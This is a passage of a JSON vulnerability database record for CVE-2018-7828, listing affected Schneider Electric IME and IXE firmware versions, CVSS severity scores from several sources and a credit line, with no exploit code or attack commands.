"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-b1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-b1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-b1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-b1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-b1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-b1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-b1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-b1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-b1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-b1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-b1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-b1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixes1_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixes1:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixe11_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixe11:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixe21_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixe21:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixe31_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixe31:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7828"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vulnerability discovered by Gjoko Krstic",
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
],
"trust": 0.3
},
"cve": "CVE-2018-7828",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-7828",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-23302",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2019-16262",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-7828",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-7828",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2019-16262",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201905-912",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1,
"value": "(4/5)"
},
{
"author": "ZSL",
"id": "ZSL-2017-5416",
"trust": 0.1,
"value": "(4/5)"
},
{
"author": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.1,
"value": "(3/5)"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16262"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015521"
},
{
"db": "NVD",
"id": "CVE-2018-7828"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-912"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
